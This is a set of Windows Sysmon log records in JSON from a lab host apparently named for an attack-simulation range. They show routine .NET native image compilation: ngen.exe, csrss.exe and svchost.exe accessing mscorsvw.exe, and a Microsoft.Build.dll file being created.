{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6742,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.839\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-001011220D00}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.839","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-001011220D00}","TargetProcessId":"4876","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6743,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.839\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-001011220D00}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.839","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-001011220D00}","TargetProcessId":"4876","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:21","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6744,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:21.839\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047D-5F25-0000-001011220D00}\r\nTargetProcessId: 4876\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:21.839","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047D-5F25-0000-001011220D00}","TargetProcessId":"4876","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:25","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6745,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:25.870\r\nProcessGuid: {A837DB8D-047D-5F25-0000-001011220D00}\r\nProcessId: 4876\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\130c-0\\Microsoft.Build.dll\r\nCreationUtcTime: 2020-08-01 05:58:25.870","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:25.870","ProcessGuid":"{A837DB8D-047D-5F25-0000-001011220D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\130c-0\\Microsoft.Build.dll","CreationUtcTime":"2020-08-01 05:58:25.870","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6746,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:25.995\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010A1270D00}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:25.995","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010A1270D00}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6747,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:25.995\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010A1270D00}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:25.995","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010A1270D00}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6748,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.011\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010A1270D00}\r\nTargetProcessId: 4924\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.011","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010A1270D00}","TargetProcessId":"4924","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6749,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.074\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010272B0D00}\r\nTargetProcessId: 4340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.074","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010272B0D00}","TargetProcessId":"4340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:26","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6750,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:26.074\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0482-5F25-0000-0010272B0D00}\r\nTargetProcessId: 4340\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:26.074","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0482-5F25-0000-0010272B0D00}","TargetProcessId":"4340","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:27","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
